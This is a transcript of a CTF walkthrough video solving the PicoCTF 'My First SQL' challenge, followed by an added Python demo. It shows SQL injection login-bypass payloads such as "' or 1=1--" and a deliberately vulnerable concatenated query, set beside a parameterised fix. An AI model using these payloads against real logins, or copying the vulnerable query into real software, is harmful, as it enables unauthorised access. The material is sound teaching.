Basic SQL Injection | PicoCTF 2017 [35] My First SQL

John Hammond · Intermediate · 🔐 Cybersecurity · 7y ago

Full Transcript

Hello everyone, my name is John Hammond, welcome back to more PicoCTF. This challenge is called My First SQL, the first challenge in the web category of level 2 here, 50 points. It says: "I really need access to this website but I forgot my password and there's no reset. Can you help?" So we can check out the website, open up a new tab here. Just like a regular form login: username and password, so credentials we would otherwise have to know. The hint here is: have you heard about SQL injection? So this is the first PicoCTF introduction to SQL injection, which is one of my favorite things, I think one of the coolest things for hacking on the internet and stuff like that.

SQL injection is tricking a back-end web program into thinking that you are inputting data into a database that runs in the back. However, it's not real data that you're putting in; you're tricking it, and it's going to take some of that data and consider it to be code. So normally you'll see queries that are trying to insert or select data from a database that's of the syntax and the style: select something, some kind of column or table information, from a specific table where whatever column or field is something else. So if you get your own input that's kind of just being concatenated or added into the original query, there is significant potential for, like, bad things to happen. That's a vulnerability if you just concatenate those SQL, like, constants and their SQL literals. So this is kind of exactly what we can assume this website is doing, and if I wanted to just, like, log in with please sub and a password password... that's weird, not okay, I don't know why that's not the regular login, that makes no sense to me, but whatever. We can inject something into this to determine whether or not a user exists by getting a condition to log in that we know is always going to be true, because this WHERE clause in that SQL statement is running a test: it is running a conditional WHERE name is equal to something that we supply. But we can inject, hence SQL injection, some other code or SQL into that, SQL being the language, of course, that's being run in the background.

I don't want to baby this up, but I know I should, and that some people are wanting to learn this for the first time. SQL injection, the magic thing, the very kind of, like, bare-bones basic test you'll see in, like, SQL injection challenges and tests of this, is just determining: can we get one thing that obviously equals another thing to return, or to go through? Sometimes you don't know the kind of string or quotations that it's using to determine a string, and maybe it's using double quotes or single quotes to denote their string, so you kind of have to fuzz-test which one you are trying to end, because you're again concatenating in your input inside of what would be expected to be a string. So you have to escape or end out of their string with a terminating quote, double quote or not, and continue the SQL with adding a new condition or an OR statement. For this we're essentially adding an if clause or test clause: another condition where something is equal to obviously itself, so that will clearly return true, 1 is equal to 1. But we don't know what it is at the very end of this query, so sometimes we'll have to comment out the rest of the SQL code, and the way we do that, again, is dependent on the SQL that's running in the background, like the back-end database version: maybe it's MySQL, maybe it's Microsoft SQL's rendition, SQLite, et cetera, and they all have a different kind of form. So again you'll have to fuzz and fudge that until you get something that will return a hit.

So if we wanted to, we could simply try double quote or 1=1 and then a hashtag, which is what you'd expect for some MySQL versions. I'm just gonna paste that in both the username and the password field, because we don't know which one is vulnerable. We can go ahead and try and log in, but that doesn't work for us. So okay, let's try with or 1=1, another pound symbol, or a hashtag, because that is what MySQL uses for comments. Try and log in with that... oh okay, we get an error with your request, and it actually shows us the query that's trying to run in the background. You don't normally see this; this is again just for your learning capability in the CTF scene, because the CTF is being nice to us where it shows us what they're trying to use. They're using a single quote where user equals the start of our input; you see we have our single quote injected into it, so that's why the error is happening, because it's trying to interpret this or 1=1, but our hashtag is being weird, it's getting in the way, because we now don't have a string that matches the rest of this. Password is in there as well. So maybe it's not this comment style, but we do know we are using single quotes for our string. So let's change that: rather than using a hashtag, the Wikipedia page suggests some other things, where you can use -- or -- to use a comment that you'd expect to see in SQLite. So let's try that again. I'm gonna use it in the username and password field, and we log in: welcome admin, flag: be careful what you let people ask, and the hash that should be different for each one. So we logged in as admin because we got an immediate return and an immediate truth in our condition, where 1=1 or 1=1, so the first thing that we return is the very first row in the table that we're looking at, likely admin, or usually admin. So cool, immediate login, we've got our flag. If we wanted to we could script this, and I'd showcase that in another video, but I don't think it's necessary for this one. We can paste that in and we can jump up on the scoreboard, 50 points, super cool. That's SQL injection. I will however want to take a note of that as our flag, because I think that's good practice. Certainly writing a flag script would also be good practice for it, but whatever, I digress. If you'd like me to, we certainly can: I'd use some Python requests, use regular expressions to pull out the flag, and we'd be grooving.

Special shout-out to the people that support me on Patreon - thank you guys so much, I love you... that was weird, sorry. $1 or more on Patreon a month will give you a special shout-out just like this at the end of every video. $5 or more on Patreon will give you special access to a folder on Google Drive that I like to upload my early access videos to, where I include all the videos that I have recorded but not yet released on YouTube, because I normally record in bulk and gradually upload them on a scheduled basis. So if you don't want to wait, you want the content right when it's ready, that's the best way to do it, just $5 a month on Patreon. If you did like this video please do press that like button, maybe leave me a comment, if you're willing to subscribe that would be awesome. Link in the description to join our Discord server; it's a cool community of CTF players, programmers and hackers. If you want to hang out with me or some other awesome people, that's the best way to do that. Hope to see you guys on Patreon, thank you, and I hope to see you in the next video, bye.
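The three payloads tried in the video, run against a stand-in for the challenge's login query. This is an added example, not code from the video or from PicoCTF: the challenge only revealed that its query wraps input in single quotes, that `#` broke the query and that `--` worked, which is consistent with an SQLite-style back end, so the example uses Python's built-in sqlite3 module. The table name `users`, the column names `username`/`password`, and the two sample accounts are constructed for the demonstration. It also shows the parameterised form of the same query, which treats the payload as an ordinary (wrong) password.

```python
import sqlite3

# Constructed sample data, not the real challenge database. admin is inserted
# first so it is the first row an always-true WHERE clause hands back.
SAMPLE_USERS = [("admin", "hunter2"), ("bob", "password1")]


def make_db():
    """Build an in-memory users table holding the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS
    )
    conn.commit()
    return conn


def build_query(username, password):
    """The vulnerable pattern: user input concatenated straight into SQL text,
    the same shape as the query the challenge's error page displayed."""
    return (
        "SELECT username FROM users "
        f"WHERE username='{username}' AND password='{password}'"
    )


def vulnerable_login(conn, username, password):
    """Run the concatenated query. Returns (status, detail, query) where
    status is 'ok' (logged in as detail), 'denied' (no row) or 'error'
    (the database rejected the SQL, as the challenge did for the '#' payload)."""
    query = build_query(username, password)
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error as exc:
        return ("error", str(exc), query)
    return ("ok", row[0], query) if row else ("denied", None, query)


def safe_login(conn, username, password):
    """Hardened form: bound parameters, so the payload can never become code."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


# The payloads from the video, in the order they were tried. Each is pasted
# into both the username and the password field, as in the video.
PAYLOADS = [
    '" or 1=1#',   # wrong quote: stays inside the single-quoted string, just a bad password
    "' or 1=1#",   # closes the string, but '#' is not a comment in SQLite: syntax error
    "' or 1=1--",  # closes the string, '--' comments out the rest: first row (admin) logs in
]


def fuzz_payloads(conn):
    """Try every payload against the vulnerable login; return (status, detail) pairs."""
    return [vulnerable_login(conn, p, p)[:2] for p in PAYLOADS]


if __name__ == "__main__":
    db = make_db()
    for payload, (status, detail) in zip(PAYLOADS, fuzz_payloads(db)):
        print(f"{payload!r:16} -> {status}: {detail}")
    print("parameterised query with the working payload ->",
          safe_login(db, "' or 1=1--", "' or 1=1--"))
```

The `#` case reproduces the fuzzing step from the video: the comment syntax that works on MySQL is an unrecognised token elsewhere, and the error (or, on a less chatty site, the absence of a login) is what tells you to move on to `--`. The parameterised version returns nothing for the same payload because the driver sends the string as a value, never as part of the statement text.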

Original Description

If you would like to support me, please like, comment & subscribe, and check me out on Patreon: https://patreon.com/johnhammond010 E-mail: johnhammond010@gmail.com PayPal: http://paypal.me/johnhammond010 GitHub: https://github.com/JohnHammond Site: http://www.johnhammond.org Twitter: https://twitter.com/_johnhammond
